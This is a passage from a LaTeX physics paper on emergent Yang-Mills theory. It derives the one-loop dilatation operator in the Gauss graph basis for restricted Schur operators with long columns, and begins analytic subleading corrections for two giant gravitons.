H_{\vec{n}_{A}}\backslash S_{n_{A}} /H_{\vec{n}_{A}}
\end{equation}
Since the above double coset contains the same number of elements as that of triples $(r_A,\mu_A,\nu_A)$, we are allowed to organize $\phi_A$ fields using the elements of this double coset instead of the triple $(r_A,\mu_A,\nu_A)$\cite{2012Adoublecosetansatz}. In what follows we show the relevant double cosets we will use to label our operators
\begin{equation}
\begin{aligned}
&\phi_2 \leftrightarrow \sigma_{2} \in H_{\vec{n}_{2}}\backslash S_{n_{2}} /H_{\vec{n}_{2}}\\
&\phi_3 \leftrightarrow \sigma_{3} \in H_{\vec{n}_{3}}\backslash S_{n_{3}} /H_{\vec{n}_{3}}
\end{aligned}
\end{equation}
where we use $\sigma_A$ to refer to an element of the double coset $H_{\vec{n}_{A}}\backslash S_{n_{A}} /H_{\vec{n}_{A}}$. For convenience we will use the notation $\vec{\sigma}=(\sigma_2,\sigma_{3})$. It is clear that $\vec{\sigma}$ refers to an element of a direct product of two double cosets.
The Gauss graph provides a graphical description of $\vec{\sigma}$. A Gauss graph consists of distinguishable nodes and directed edges stretching between nodes. We allow an edge to return to where it departs,
but at each node, the numbers of edges departing and arriving should be equal. This constraint follows from the Gauss law of the emergent gauge theory \cite{2005DbranesInYangMills,2012Adoublecosetansatz}. More details of the connection between graphs and elements of a double coset can be found in \cite{2012StringsfromFeynman}. It is evident that both permuting edges departing from a given node and permuting those arriving at a given node yields an identical Gauss graph. Thus, non-equivalent Gauss graphs can be specified by elements of a double coset and serve as a graphical description of them. In our cases, a Gauss graph describing $\vec{\sigma}$ has $p$ nodes corresponding to columns of Young diagram $R$. There is a species of edges related to each type of $\phi_2$ and $\phi_3$ fields, while the number of edges of this species is respectively determined by the number of fields, $n_2$ and $n_3$. For each $\vec{\sigma}$, the relevant Gauss graph shows a specified configuration. An example of the configuration of the Gauss graph is shown in Figure 1 of \cite{2012Adoublecosetansatz}.
To describe a Gauss graph we let $(n_{A})_{i\rightarrow j}$ denote the number of edges stretching from node $i$ to node $j$, while $(n_{A})_{ij}=(n_{A})_{i\rightarrow j}+(n_{A})_{j\rightarrow i}$ denotes the amount of edges connecting node $i$ and node $j$. In particular, we assume $(n_{A})_{ii}=(n_{A})_{i\rightarrow i}$.
Following \cite{2020EmergentYangMills} we will transform from the restricted Schur polynomial basis to the Gauss graph basis. Since we are considering the displaced corners limit when $R$ has $p$ long columns, some modification of the discussion of \cite{2020EmergentYangMills} is needed. We will use the group theoretical coefficients
\begin{equation}\label{group theoretical coefficients for long columns}
C^{r_A}_{\mu_{A} \nu_{A}}(\tau)=\left|H_{\vec{n}_A}\right| \sqrt{\frac{d_{r_A}}{n_A !}}\sum_{k,l=1}^{d_{r_A}} \Gamma^{(r_A^T)}_{k l}(\tau) B_{k \mu_{A}}^{r_A \rightarrow 1^{\vec{n}_A}} B_{l \nu_{A}}^{r_A \rightarrow 1^{\vec{n}_A}}
\end{equation}
to transform the labels of $\phi_{A}$ fields, where $\tau$ is an element of $S_{n_{A}}$, $d_{r_{A}}$ is the dimension of $r_{A}$, $\left|H_{\vec{n}_A}\right|$ is the order of $H_{\vec{n}_A}$, and $\Gamma^{(r_A^T)}_{k l}(\tau)$ is the matrix representing $\tau$ in the representation $r_A^T$, which is the conjugate representation of $r_A$. $B_{k \mu_{A}}^{r_A \rightarrow 1^{\vec{n}_A}}$ is a branching coefficient, defined by
\begin{equation}
\sum_{\mu_A} B_{k \mu_{A}}^{r_A \rightarrow 1^{\vec{n}_A}} B_{l \mu_{A}}^{r_A \rightarrow 1^{\vec{n}_A}}=\frac{1}{|H_{\vec{n}_{A}}|}\sum_{\gamma\in H_{\vec{n}_{A}}}\Gamma^{(r_A^T)}_{kl}(\gamma)
\end{equation}
where $1^{\vec{n}_A}$ denotes the anti-trivial representation of $H_{\vec{n}_A}$, which might appear more than once in $r_A$. $\mu_A$ labels these multiple copies so that $\mu_A$ runs from 1 to the number of copies of $1^{\vec{n}_A}$ in $r_A$.
One might be concerned that $\mu_A$ has already been used to specify the multiplicity of $r_A$ as a subspace of the carrier space of $R$. We use this notation on purpose since it has been proved in \cite{2012Adoublecosetansatz} that the number of copies of $r_A$ in $R$ is equal to that of $1^{\vec{n}_A}$ in $r_A$, if we remove $(n_A)_{i}$ boxes from the $i$th column of $R$ to obtain $r_A$.
Using these coefficients, we define the Gauss graph operators by
\begin{equation}\label{basis transformation}
O_{R,r_1}(\vec{\sigma})=\sum_{r_2\vdash n_2}\sum_{r_3\vdash n_3}\sum_{\vec{\mu},\vec{\nu}}C^{r_2}_{\mu_{2} \nu_{2}}(\sigma_2)C^{r_3}_{\mu_{3} \nu_{3}}(\sigma_3)O_{R,(\vec{r})\vec{\mu}\vec{\nu}}
\end{equation}
Thus, we need a Gauss graph and two Young diagrams $R$ as well as $r_1$ to label a Gauss graph operator, while this Gauss graph, as discussed above, describes element $\vec{\sigma}$ of a direct product of double cosets. For the sake of an unit two point function, we then define the normalized operator $\hat{O}_{R,r_1}(\vec{\sigma})$ by
\begin{equation}
O_{R,r_1}(\vec{\sigma})=\sqrt{\prod_{A=2}^{3}\prod_{i,j=1}^{p}(n_A)_{i\rightarrow j}!}\hat{O}_{R,r_1}(\vec{\sigma})
\end{equation}
We now turn to the action of the dilatation operator in the Gauss graph basis. To obtain it we need to evaluate
\begin{equation}\label{transform to Gauss graph basis}
(M_{AB})_{R,r_1,\vec{\sigma}; T,t_1,\vec{\tau}} =
\sum_{\substack{
r_2,r_3,\vec{\mu},\vec{\nu}\\
t_2,t_3,\vec{\alpha},\vec{\beta}}}
C^{(r_2,r_3)}_{\vec{\mu}\vec{\nu}}(\vec{\sigma}) C^{(t_2,t_3)}_{\vec{\alpha}\vec{\beta}}(\vec{\tau})(\mathcal{M}_{AB})_{R(\vec{r})\vec{\mu}\vec{\nu},T(\vec{t})\vec{\alpha}\vec{\beta}}
\end{equation}
where
\begin{equation}
C^{(r_2,r_3)}_{\vec{\mu}\vec{\nu}}(\vec{\sigma})=C^{r_2}_{\mu_{2} \nu_{2}}(\sigma_2)C^{r_3}_{\mu_{3} \nu_{3}}(\sigma_3)
\end{equation}
The detailed calculation is given in \cite{2020EmergentYangMills}. Our case is almost identical so we will simply quote the result
\begin{equation}\label{D31,D21 in Gauss graph basis}
\begin{aligned}
&D_{31}O_{R,r_1}(\vec{\sigma})=\sum_{i>j=1}^{p}(n_3)_{ij}\Delta_{ij}O_{R,r_1}(\vec{\sigma})\\
&D_{21}O_{R,r_1}(\vec{\sigma})=\sum_{i>j=1}^{p}(n_2)_{ij}\Delta_{ij}O_{R,r_1}(\vec{\sigma})\\
\end{aligned}
\end{equation}
where operator $\Delta_{ij}$ acts only on the $R,r_1$ labels and we have $\Delta_{ij}=\Delta^{0}+\Delta^{+}+\Delta^{-}$. Denote the length of the $i$th column of the Young diagram $r$ by $l_{i}$. Young diagram $r^{+}_{ij}$ is obtained by removing a box from column $j$ and adding it to column $i$. Young diagram $r^{-}_{ij}$ is obtained by removing a box from column $i$ and adding it to column $j$.
Using this notation we can write the action of $\Delta^{0}$ and $\Delta^{\pm}$ as
\begin{equation}
\begin{aligned}
&\Delta^{0}_{ij}O_{R,r}(\vec{\sigma})=-(2N-l_{r_i}-l_{r_j})O_{R,r}(\vec{\sigma})\\
&\Delta^{\pm}_{ij}O_{R,r}(\vec{\sigma})=\sqrt{(N-l_{r_i})(N-l_{r_j})}O_{R^{\pm}_{ij},r^{\pm}_{ij}}(\vec{\sigma})\\
\end{aligned}
\end{equation}
The action of $D_{32}$, which is described by matrix $M_{32}$, is more complicated. It is given by
\begin{equation}\label{M32 in Gauss graph basis}
\begin{aligned}
&\left(M_{3 2}\right)_{R, r_{1}, \vec{\sigma}; T, t_{1}, \vec{\tau}}= \sum_{R^{\prime}_{i},T'_{j}} \frac{\delta_{r_{1} t_{1}} \delta_{R_{i}^{\prime} T_{j}^{\prime}}}{\sqrt{\left|O_{R, r_{1}}\left(\vec{\sigma}\right)\right|^{2}\left|O_{T, t_{1}}\left(\vec{\tau}\right)\right|^{2}}} \sqrt{\frac{c_{R R_{i}^{\prime}} c_{T T_{j}^{\prime}}}{l_{R_{i}} l_{T_{j}}}} \\
&\times\left[ 2\delta_{ik}(n_3)_{i}(n_2)_{i}-\left( (n_3)_{ki}(n_2)_{ii}+(n_{3})_{ii}(n_2)_{ik} \right) \right]\sum_{\gamma_1,\gamma_2\in H_2}\delta(\vec{\sigma}^{-1}\gamma_1\vec{\tau}\gamma_2)
\end{aligned}
\end{equation}
where $R'_{i}$ denotes the Young diagram produced by removing one box from the $i$th column, and $c_{R R_{i}^{\prime}}$ is the factor of the removed box. We assume that $t_A$ is obtained by removing $(n'_A)_i$ boxes from the $i$th column of $T$ and $H_2=H_{\vec{n}'_3}\times H_{\vec{n}_2} $.
A Gauss graph has the norm as what follows
\begin{equation}
\left| O_{R,r}(\vec{\sigma}) \right|^2=\prod_{i,j=1}^{p}\left(n_{2}^{\vec{\sigma}}\right)_{i\rightarrow j}!\left(n_{3}^{\vec{\sigma}}\right)_{i\rightarrow j}!
\end{equation}
where the superscript $\vec{\sigma}$ of $n_A$ indicates it is counting edges in the Gauss graph describing $\vec{\sigma}$. In this paper, we focus on the matrix $M_{32}$ which describes the interaction between excitations.
\subsection{Long Columns}
Our discussion has frequently used results obtained in \cite{2020EmergentYangMills}, in which the discussion about the displaced corner limit is given in the case that restricted Schur polynomials have long rows. But the same conclusions follow for the long column case, and we will explain it in this section.
Firstly, we argue that the action of the dilatation operator on restricted Schur polynomials, $(\mathcal{M}_{AB})_{R(\vec{r})\vec{\mu}\vec{\nu},T(\vec{t})\vec{\alpha}\vec{\beta}}$, in the long column case has the same form as that in the long row case.
In the displaced corners limit, swapping boxes in the same column yields a minus sign. Thus, $\Gamma^R((1,1_A))$ should be identified with $\text{sgn}((1,1_A))(1,1_A)=-(1,1_A)$, while $\Gamma^R((1,1_B))$ should be identified with $-(1,1_B)$. In equation (\ref{action on restricted Schur's}) we find four $\Gamma^R((1,1_A))$ and two $\Gamma^R((1,1_B))$, which gives rise to $(-1)^6=1$. Thus, this action is identical in both cases of the displaced corners limit.
Next, the action of the dilatation operator on Gauss graph operators, $(M_{AB})_{R,r_1,\vec{\sigma}; T,t_1,\vec{\tau}}$, will also be proved identical in both cases.
Note that we obtain this action by using group theoretical coefficients $C^{r_A}_{\mu_A \nu_A}$ to perform the transformation shown in equation (\ref{transform to Gauss graph basis}). The coefficient used in the long row case reads
\begin{equation}
\widetilde{C}^{r_A}_{\mu_{A} \nu_{A}}(\tau)=\left|H_{\vec{n}_A}\right| \sqrt{\frac{d_{r_A}}{n_A !}}\sum_{k,l=1}^{d_{r_A}} \Gamma^{(r_A)}_{k l}(\tau) B_{k \mu_{A}}^{r_A \rightarrow 1_{H_{\vec{n}_A}}} B_{l \nu_{A}}^{r_A \rightarrow 1_{H_{\vec{n}_A}}}
\end{equation}
where $1_{H_{\vec{n}_A}}$ denotes the trivial representation of $H_{\vec{n}_A}$ as a subspace of $r_A$. The tilde, as in $\widetilde{C}^{r_A}_{\mu_{A} \nu_{A}}(\tau)$ is used to distinguish this branching coefficient from the coefficient used in the long column case. The equality
\begin{equation}\label{equality about branching coefficients}
\sum_{\mu}B_{i\mu}^{r\rightarrow 1^{\vec{m}}} B_{j\mu}^{r\rightarrow 1^{\vec{m}}}=\sum_{\mu}B_{i\mu}^{r^T\rightarrow 1_{H_{\vec{m}}}} B_{j\mu}^{r^T\rightarrow 1_{H_{\vec{m}}}}=\frac{1}{|H_{\vec{m}}|}\sum_{\gamma\in H_{\vec{m}}}\Gamma_{ij}^{(r^T)}(\gamma)
\end{equation}
is useful in what follows. In the detailed calculation of the change, all branching coefficients are all summed in this way. Clearly, if we replace $C^{r_A}_{\mu_{A} \nu_{A}}(\tau)$ with $\widetilde{C}^{r_A}_{\mu_{A} \nu_{A}}(\tau)$ and $\sum_{r_A\vdash n_A}$ with $\sum_{r_A^T\vdash n_A}$ in the transformation (\ref{transform to Gauss graph basis}), the final result is unchanged, thanks to the equality (\ref{equality about branching coefficients}). This proves that the action of the dilatation operator in Gauss graph basis given in the last section is the correct result in the long column case.
\section{Emergent Yang-Mills Theory: at The Leading Order}\label{emergentYM}
In this section, we will interpret the action of the dilatation operator at the leading order, arguing that gives the dynamics of a Yang-Mills theory. Basically, we firstly identify the action shown in equations (\ref{D31,D21 in Gauss graph basis}) and (\ref{M32 in Gauss graph basis}) with the Hamiltonian describing the dynamics of some states written using an occupation number representation. Each state corresponds to a Gauss graph. Then, this Hamiltonian is recognized as the Hamiltonian of the worldvolume dynamics of giant graviton branes, which is a super Yang-Mills theory.
\subsection{Emergent Hamiltonian}
The action of the dilatation operator $D_{32}$ on Gauss graph operators, given by equation $(\ref{M32 in Gauss graph basis})$, can naturally be identified as a Hamiltonian of oscillators. It is evident that $D_{32}$ acts only on Gauss graph labels so that operators don't mix if their $R,r_1$ labels are different. Further, the configuration of the Gauss graph can be interpreted as an occupation number representation of the state by identifying an oriented edge for $\phi_A$ field stretching from the $i$th node to $j$th node as a particle created by the creation operator $(\bar{b}_A)_{ij}$. With these states, it is possible to rewrite $D_{32}$ in terms of some creation and annihilation operators. They are divided into two categories, one corresponding to each type of field.
We perform this rewriting next. Introduce the oscillators $(\bar{b}_2)_{ij},(b_2)_{ij}$ to describe $\phi_2$ field, as well as oscillators $(\bar{b}_3)_{ij},(b_3)_{ij}$ for the $\phi_3$ field. The oscillator algebra reads
\begin{equation}
[(b_A)_{ij},(\bar{b}_B)_{kl}]=\delta_{AB}\delta_{il}\delta_{jk}; \quad [(b_A)_{ij},(b_A)_{kl}]=[(\bar{b}_A)_{ij},(\bar{b}_B)_{kl}]=0
\end{equation}
where $A,B=2,3$. We can also define the number operators by
\begin{equation}
(\hat{n}_A)_{i\rightarrow j}=(\bar{b}_A)_{ij}(b_A)_{ji}; \quad
\end{equation}
it is convenient to introduce $(\hat{n}_A)_{ij}=(\hat{n}_A)_{ji}=(\hat{n}_A)_{i\rightarrow j}+(\hat{n}_A)_{j\rightarrow i}$ (in particular, $(\hat{n}_A)_{ii}=(\hat{n}_A)_{i\rightarrow i}$), and
\begin{equation}
(\hat{n}_A)_{i}=\sum_{j=1}^p (\hat{n}_A)_{ij}=\sum_{j=1}^{p} (\hat{n}_A)_{ji}.
\end{equation}
A state corresponding to the Gauss graph operator $O_{R,r}(\vec{\sigma})$ is given by
\begin{equation}
O_{R,r}(\vec{\sigma}) \leftrightarrow \prod_{i,j=1}^{p} (\bar{b}_2)_{ij}^{(n_2^{\vec{\sigma}})_{i\rightarrow j}}(\bar{b}_3)_{ij}^{(n_3^{\vec{\sigma}})_{i\rightarrow j}}\ket{0}
\end{equation}
where the vaccum state $\ket{0}$ obeys $(a_{A})_{ij}\ket{0}=0$ for any $A,B=2,3$ and $i,j=1,2,\dots,p$. The $R,r_1$ labels seem to be missing on the RHS, but, as we discuss above, the dynamics between states with the same $R,r_1$ labels completely describe the action of $D_{32}$, so that we can drop them to simplify our discussion. With this identification, the action of $D_{32}$ can be rewritten as\cite{2020EmergentYangMills}
\begin{equation}
\begin{aligned}
H_{32}=\sum_{i,j=1}^{p}&\sqrt{\frac{(N-l_{r_i})(N-l_{r_j})}{l_{r_i} l_{r_j}}}\\
&\times\Big( -(\hat{n}_3)_{ji}(\bar{b}_2)_{jj}(b_2)_{ii}-(\hat{n}_2)_{ji}(\bar{b}_3)_{jj}(b_3)_{ii}+2\delta_{ij}(\hat{n}_{3})_{i}(\hat{n}_{2})_{i} \Big)
\end{aligned}
\end{equation}
Note that only the closed loop at nodes in the Gauss graph are dynamical---they are the only objects that will be annihilated or created.
Similarly, we can simplify the action of $D_{31}$ and $D_{21}$, shown in equation (\ref{D31,D21 in Gauss graph basis}), at large $N$ and further identify them with terms $H_{31}$ and $H_{21}$ in the Hamiltonian. These terms describe the interaction between the states introduced above. At large $N$, we identify $O_{R_{ij}^{\pm},r_{ij}^{\pm}}(\vec{\sigma})$ with $O_{R,r}(\vec{\sigma})$ so that the $R,r_1$ labels are again not needed to describe these terms. After simplification, the action of $D_{31}$ and $D_{21}$ can be rewritten as
\begin{equation}
\begin{aligned}
&H_{31}=-\sum_{i,j=1}^{p}\left(\sqrt{N-l_{r_i}}-\sqrt{N-l_{r_j}}\right)^2(\hat{n}_3)_{i\rightarrow j}\\
&H_{21}=-\sum_{i,j=1}^{p}\left(\sqrt{N-l_{r_i}}-\sqrt{N-l_{r_j}}\right)^2(\hat{n}_2)_{i\rightarrow j}\\
\end{aligned}
\end{equation}
The complete Hamiltonian, identified with the action of the dilatation operator, is $H=H_{32}+H_{31}+H_{21}$. We will soon see that this Hamiltonian describes the dynamics of a Yang-Mills theory.
\subsection{Identification with a Yang-Mills Theory}
We will prove that the emergent Hamiltonian obtained in the last subsection matches with the Hamiltonian of a Yang-Mills theory, which we call the emergent Yang-Mills theory. What Yang-Mills theory do we expect? The operators we study have $p$ long columns so that this system can be identified with a system of $p$ giant gravitons based on the holographic duality. It motivates us to guess that the emergent Hamiltonian describes the worldvolume dynamics of these gravitons. We expect this world volume dynamics, which should be a super Yang-Mills theory since it arises from the dynamics of open string excitations stretching between the giant graviton branes, to match with the emergent Hamiltonian we derive.
To confirm our expectation, we will explicitly write down the Hamiltonian of this Yang-Mills theory for comparison. We expect a $U(p)$ gauge theory as the system consists of $p$ giant graviton branes. Each column in Young diagram $R$, or equivalently, each node in the Gauss graph corresponds to a brane. Therefore, the edges are naturally interpreted as open string excitations. The branes move in AdS$_5$ spacetime with metric
\begin{equation}
ds^2=R^2\left( -\cosh^2\rho dt^2 + d\rho^2+ \sinh^2\rho d\Omega_{3}^{2} \right)
\end{equation}
A brane corresponding to the $i$th column in $R$ has $\rho$ coordinate specified by
\begin{equation}
\cosh\rho =\sqrt{1+\frac{l_{R_i}}{N}} \qquad \sinh\rho=\sqrt{\frac{l_{R_i}}{N}}
\end{equation}
In the displaced corners limit $l_{R_i}$ are not equal, hence the branes are separated, which implies that the Coulomb branch of this gauge theory is being considered. In the low energy limit the dynamics is described by a $U(1)^p$ gauge theory. In addition, since the $\text{su}(3)$ sector is part of the $\text{su}(2|3)$ sector of the $\mathcal{N}=4$ super Yang-Mills theory, we do not expect to the recover the complete $U(1)^p$ gauge theory. In fact, we should reproduce part of the $s-$wave bosonic sector of the emergent Yang-Mills theory \cite{2020EmergentYangMills}.
The above discussion motivates us to study a $U(p)$ gauge theory of adjoint scalars living on an $S^3$. The action reads
\begin{equation}
\begin{gathered}
S=\frac{1}{g_{Y M}^{2}} \int_{\mathbb{R} \times S^{3}}\left[\operatorname{Tr}\left(\partial_{\mu} X \partial^{\mu} X^{\dagger}+\partial_{\mu} Y \partial^{\mu} Y^{\dagger}-\frac{1}{R^{2}}\left(X X^{\dagger}+Y Y^{\dagger}\right)-[X, Y][Y^{\dagger}, X^{\dagger}]\right)\right. \\
\left.-\sum_{i \neq j} m_{i j}^{2}\left(X_{i j} X_{j i}^{\dagger}+Y_{i j} Y_{j i}^{\dagger}\right)\right] d t R^{3} d \Omega_{3}
\end{gathered}
\end{equation}
where $m_{ij}$ are masses of the off diagonal matrix elements of $X,Y$, proportional to the distances separating the branes. The $s-$wave sector is given by
\begin{equation}
\begin{aligned}
S=\frac{R^{3} \Omega_{3}}{g_{Y M}^{2}} \int_{\mathbb{R}} &\left[\operatorname{Tr}\left(\dot{X} \dot{X}^{\dagger}+\dot{Y} \dot{Y}^{\dagger}-\frac{1}{R^{2}}\left(X X^{\dagger}+Y Y^{\dagger}\right)-[X, Y][Y^{\dagger}, X^{\dagger}]\right)\right.\\
&\left.-\sum_{i \neq j} m_{i j}^{2}\left(X_{i j} X_{j i}^{\dagger}+Y_{i j} Y_{j i}^{\dagger}\right) d t\right]
\end{aligned}
\end{equation}
The action of the one-loop dilatation operator should correspond to the interaction Hamiltonian give by
\begin{equation}
H_{\text{int}}=\frac{R^{3} \Omega_{3}}{g_{Y M}^{2}}\left[ \sum_{i\neq j}^{p}m_{ij}^{2}\left(X_{i j} X_{j i}^{\dagger}+Y_{i j} Y_{j i}^{\dagger}\right)+\text{Tr}\left([X, Y][Y^{\dagger}, X^{\dagger}]\right) \right]
\end{equation}
Since our operators in the original theory are constructed using $\phi_A$ but not $\phi_A^{\dagger}$, a proper truncation should be made in the emergent theory. This truncation is acheieved by setting $X=\bar{a},X^{\dagger}=a,Y=\bar{b}$ and $Y^{\dagger}=b$. Then, the truncated normal ordered interaction Hamiltonian is given by
\begin{equation}
H_{\text{int}}=\frac{R^{3} \Omega_{3}}{g_{Y M}^{2}}\left[ \sum_{i\neq j}^{p}m_{ij}^{2}\left(\bar{a}_{i j} a_{j i}+\bar{b}_{i j} b_{j i}\right)+\text{Tr}\left([\bar{b}, \bar{a}][a, b]\right) \right]
\end{equation}
By identifying $\bar{b},b$ with $\bar{b}_3,b_3$ and $\bar{a},a$ with $\bar{b}_2,b_2$, we can prove the identification in what follows
\begin{equation}
\renewcommand{\arraystretch}{1.5}
\begin{array}{lll}
m_{ij}^{2}\bar{a}_{i j} a_{j i} &\leftrightarrow & H_{31}\\
m_{ij}^{2}\bar{b}_{i j} b_{j i}&\leftrightarrow& H_{21}\\
\text{Tr}\left([\bar{b}, \bar{a}][a, b]\right) &\leftrightarrow& H_{32}
\end{array}
\end{equation}
A detailed discussion is given in \cite{2020EmergentYangMills}. Now we have confirmed that at the leading order, the action of the dilatation operator perfectly describes the dynamics of giant graviton branes.
\section{The Subleading Corrections}\label{analyticsubleading}
In this section, we will focus on a system of two giant gravitons, in which the Young diagram labeling the operator has two long columns. We also assume that $n_2=n_3=2$, i.e. our operators are constructed using many $\phi_1$ fields, two $\phi_2$ fields and two $\phi_3$ fields. This restriction significantly simplify our formulas so that an analytic calculation of matrix elements of the dilatation operator is possible. We will perform this calculation in this section, obtaining an explicit expression for the action of the dilatation operator in the Gauss graph basis, which is valid to all orders in $1/N$. This exact result will be expanded to obtain the subleading correction to the leading action. The leading action has already been matched to Yang-Mills theory at linear level. The subleading corrections correspond to interactions. Finally, we find the spectrum of the leading contribution to $D_{32}$ has evenly spaced energy levels, described by a formula which fixes the size of the energy to be an order 1 number at large $N$, while the subleading corrections cause a small correction to the leading energy level.
\subsection{The System of Two Giant Gravitons}
We study a set of operators labeled by Young diagram $R$ with only two columns. The operators are constructed using many $\phi_1$ fields, two $\phi_2$ fields and two $\phi_3$ fields, i.e. we set $p=2$ and $n_3=n_2=2$ and take $n_1$ to be of order $N$. These choices imply some significant simplifications:
\begin{itemize}
\item[1.] Although the dilatation operator acting on operators labeled by Young diagrams with two columns produces operators with three columns, the contribution of these three column operators will be neglected---the extra column of these operators is much shorter than the two long columns, so they correspond to bound states of two threebranes with some Kaluza-Klein (KK) gravitons. And graviton emission happens when a two threebrane state transforms into a state of two threebranes with KK gravitons, which implies that in the ’t Hooft limit the amplitude of this transition is proportional to the string coupling $g_s \propto \frac{1}{N}$. Thus, the mixing with more than two columns operators is suppressed and can be dropped. This simplification allows us to study the action of the dilatation operator in the basis consisting of a finite number of operators, each with two long columns. Precisely, the restricted Schur polynomials basis consists of 16 types of operators as shown below
\begin{equation}\label{restricted Schur's basis of two giant gravitons}
\begin{aligned}
&O_{aa}(\xi_0,\xi_1);\quad O_{da}(\xi_0,\xi_1);\quad O_{ea}(\xi_0,\xi_1);\quad O_{ba}(\xi_0,\xi_1)\\
&O_{ad}(\xi_0,\xi_1);\quad O_{ae}(\xi_0,\xi_1);\quad O_{dd}(\xi_0,\xi_1);\quad O_{de}(\xi_0,\xi_1)\\
&O_{ed}(\xi_0,\xi_1);\quad O_{ee}(\xi_0,\xi_1);\quad O_{bd}(\xi_0,\xi_1);\quad O_{be}(\xi_0,\xi_1)\\
&O_{ab}(\xi_0,\xi_1);\quad O_{db}(\xi_0,\xi_1);\quad O_{eb}(\xi_0,\xi_1);\quad O_{bb}(\xi_0,\xi_1)\\
\end{aligned}
\end{equation}
Our notation is as follows: we use $(\xi_0,\xi_1)$ to specify the Young diagram $r_1$ which has $\xi_0$ rows with two boxes and $\xi_1$ rows with one box. $a,b,c,d$ are used to specify the the irreducible representation $r_A$ and $\vec{n}_A$, the vector with elements as amounts of boxes removed from each column of the Young diagram $R$ to be assembled into $r_A$, as what follows
\begin{equation}
\begin{aligned}
&a \rightarrow {\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,}{\,},{\,},{*},{*})}; {\tiny \yng(2,2,2,2,1)},{\tiny \yng(1,1)}\\
&b \rightarrow {\tiny \young({\,}{\,},{\,}{\,},{\,}{*},{\,}{*},{\,},{\,},{\,})}; {\tiny \yng(2,2,1,1,1,1,1)},{\tiny \yng(1,1)}\\
&d \rightarrow {\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,}{*},{\,},{\,},{*})}; {\tiny \yng(2,2,2,1,1,1)},{\tiny \yng(2)}\\
&e \rightarrow {\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,}{*},{\,},{\,},{*})}; {\tiny \yng(2,2,2,1,1,1)},{\tiny \yng(1,1)}\\
\end{aligned}
\end{equation}
where on the RHS the first Young diagram denotes $R$ while the last Young diagram denotes $r_A$. We label the boxes to be removed by $*$. For example, by removing one box from each column of $R$ and assembling them into ${\tiny \yng(2)}$ we obtain $d$, so that we have $\vec{n}=(1,1)$. Both $r_2$ and $r_3$ can be one of $a,b,c,d$ so that we have $4\times4=16$ operators, while the first subscript specifies $r_2$ and the second subscript specifies $r_3$. For instance, $O_{ae}(\xi_0,\xi_1)$ denote the operator labeled by $r_1=(\xi_0,\xi_1),r_2=a,r_3=e$ with $\vec{n}_2=(2,0),\vec{n}_3=(1,1)$---we first remove one box from each column of $R$ and reassemble them into ${\tiny \yng(1,1)}$ to obtain $r_3=e$, and then remove two boxes from the first column of $R$ to obtain $r_2=a$. Note that when deciding how removed boxes can be assembled to give an irreducible representation, we must respect edges that are joined. The remaining part of $R$ is nothing but $r_1=(\xi_0,\xi_1)$.
\item[2.] It can be proved that when the Young diagram $R$ has only two columns, no multiplicity label $\vec{\mu}$ is needed, i.e. each $\vec{r}=(r_1,r_2,r_3)$, the irreducible representation of $S_{n_1}\times S_{n_2}\times S_{n_3}$ as the subgroup of $S_{n_T}$, appear only once as the subspace of $R$ \cite{2011Surprisingly}. This fact simplifies the interwiner $P_{R,(\vec{r}) \vec{\mu} \vec{\nu}}$ as the projector $P_{R\rightarrow(\vec{r})}$ from $R$ onto its subspace $\vec{r}$. It allows us to explicitly write down $P_{R\rightarrow(\vec{r})}$ using the basis of $\vec{r}$ represented by the Young-Yamanouchi symbol.
As an example, we will explain how to obtain $P_{R\rightarrow(\xi_0,\xi_1)da}$, where the subspace it projects onto is specified by $r_1=(\xi_0,\xi_1),r_2=d,r_3=a$. This subspace should be spanned by
\begin{equation}
\ket{1,i}=\ket{{\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,}{4},{\,},{3},{2},{1})}\,i};\quad \ket{2,i}=\ket{{\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,}{3},{\,},{4},{2},{1})}\,i}
\end{equation}
where we assume $S_{n_3}$ acts on numbers $1,2$ while $S_{n_2}$ acts on $3,4$. We use label $i$ to denote $d_{r_1}$ different ways to fill out the remaining boxes. Thus, the above basis spans a $2d_{r_1}-$dimensional space given by $(\xi_0,\xi_1)da\oplus (\xi_0,\xi_1)ea$. The irreducible representation $(\xi_0,\xi_1)da$ is furnished by vectors
\begin{equation}
\begin{aligned}
&\ket{{\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,},{\,})}\,i,{\tiny \young({4}{3})},{\tiny \young({2},{1})}}=A\ket{1,i}+B\ket{2,i}\\
\end{aligned}
\end{equation}
Allowing $\Gamma^{R}((34))$ to act on the above vector and using the well-known action of $\Gamma^{R}(\sigma)$ on the Young-Yamanouchi vector, we obtain the following equation
\begin{equation}
\begin{aligned}
&A=-\frac{1}{(\xi_1+2)}A+\sqrt{1-\frac{1}{(\xi_1+2)^2}}B\\
&B=\sqrt{1-\frac{1}{(\xi_1+2)^2}}A+\frac{1}{(\xi_1+2)}B
\end{aligned}
\end{equation}
With the normalization $A^2+B^2=1$, we obtain a solution
\begin{equation}
A=\sqrt{\frac{\xi_1+1}{2(\xi_1+2)}}; \quad B=\sqrt{\frac{\xi_1+3}{2(\xi_1+2)}};
\end{equation}
Finally, we can write the projector $P_{R\rightarrow(\xi_0,\xi_1)da}$ as
\begin{equation}
\begin{aligned}
P_{R\rightarrow(\xi_0,\xi_1)da}&=\sum_{i} \ket{{\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,},{\,})}\,i,{\tiny \young({4}{3})},{\tiny \young({2},{1})}}\bra{{\tiny \young({\,}{\,},{\,}{\,},{\,}{\,},{\,},{\,})}\,i,{\tiny \young({4}{3})},{\tiny \young({2},{1})}}\\
&=\sum_i \left(\frac{\xi_1+1}{2(\xi_1+2)}\ket{1,i}\bra{1,i} + \frac{\sqrt{(\xi_1+1)(\xi_1+3)}}{2(\xi_1+2)}\ket{1,i}\bra{2,i} \right. \\
&\left. + \frac{\sqrt{(\xi_1+1)(\xi_1+3)}}{2(\xi_1+2)}\ket{2,i}\bra{1,i} + \frac{\xi_1+3}{2(\xi_1+2)}\ket{2,i}\bra{2,i} \right)
\end{aligned}
\end{equation}
